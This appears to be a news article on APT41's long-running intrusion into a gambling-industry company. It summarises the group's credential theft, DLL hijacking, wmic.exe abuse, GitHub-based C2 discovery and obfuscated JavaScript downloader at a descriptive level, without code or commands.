Introduction
APT41, also known as Brass Typhoon, Wicked Panda, or Winnti, is a well-known Chinese nation-state actor responsible for various cyber espionage campaigns. Recently, APT41 was linked to a highly sophisticated cyber attack on the gambling and gaming industry. The attack showcased the group’s advanced capabilities in infiltrating systems, evading detection, and adapting to the security measures of the targeted companies.
Targeted Attack on the Gambling Sector
APT41 conducted a stealthy cyber attack that persisted for nearly nine months, primarily targeting the gambling and gaming sectors. According to Ido Naor, co-founder and CEO of Security Joes, the attackers were able to gather valuable information, including network configurations, user passwords, and sensitive data from the LSASS process. Throughout the attack, the threat actors consistently updated their tools in response to the defense mechanisms employed by the company’s security team, ensuring their persistent access to the compromised network.
This cyber attack shares similarities with an intrusion known as Operation Crimson Palace, which has been tracked by cybersecurity vendor Sophos.
Adaptive Tactics and Tools
What sets this attack apart is APT41’s methodical approach and ability to evolve. The group continuously updated its tools based on the defense tactics they observed. By gathering insights from the security team’s responses, the attackers adjusted their strategies to evade detection. They utilized a custom toolset designed to bypass installed security software, while harvesting critical information and establishing covert communication channels for remote access.
APT41’s operation is believed to be financially motivated, with Naor stating that the attackers were likely after financial gain. The campaign displayed a level of sophistication rarely seen, blending espionage with financially driven intrusions, including ransomware attacks and cryptocurrency mining.
Exploiting Credentials and Escalating Privileges
Once APT41 infiltrated the targeted company’s infrastructure, they launched a DCSync attack, aiming to steal password hashes of service and admin accounts. By acquiring these credentials, they gained control over the network, focusing on administrative and developer accounts to maintain their foothold. During this phase, the attackers conducted reconnaissance and escalated their privileges, ultimately executing additional payloads to deepen their control over the compromised systems.
Several techniques were employed, including Phantom DLL Hijacking and abusing the legitimate Windows utility wmic.exe to execute malicious code. The attackers exploited their access to administrator accounts, triggering malicious actions through service accounts with elevated privileges.
Malicious Payload Deployment and Command-and-Control
One key element of the attack involved deploying a malicious DLL file named TSVIPSrv.dll, which was retrieved via the SMB protocol. This payload enabled contact with a hard-coded command-and-control (C2) server. In cases where the C2 server failed, the malware adapted by updating its C2 information using a novel method that involved scraping GitHub to locate new C2 servers.
The malware’s creative use of GitHub allowed it to search for sequences of capitalized words, extracting an encoded IP address that directed the new C2 connection. Once connected, the system would be profiled, and more malware would be fetched and executed through socket connections.
Obfuscated JavaScript Code and Targeted Machines
After their activities were detected, APT41 briefly went silent, but eventually returned with a revamped approach. The group employed heavily obfuscated JavaScript code embedded in a modified XSL file. Using the legitimate tool wmic.exe, they triggered the execution of this malicious script, which acted as a downloader for further payloads.
A key aspect of this phase was the deliberate targeting of specific machines within the VPN subnet, identified by IP addresses containing the substring "10.20.22." This selective targeting highlights the attackers’ precision, as they aimed to impact only valuable devices within the company’s network.
Conclusion
APT41’s attack on the gambling and gaming industry showcases the evolving nature of state-sponsored cyber threats. With a sophisticated approach that involved gathering credentials, evading detection, and using custom tools, the attackers demonstrated their ability to maintain long-term access to the compromised network. The incident underscores the importance of proactive cybersecurity measures, especially in sectors vulnerable to such high-level attacks. The persistence and adaptability of APT41 signal the growing challenges organizations face in defending against nation-state actors.
0 Comments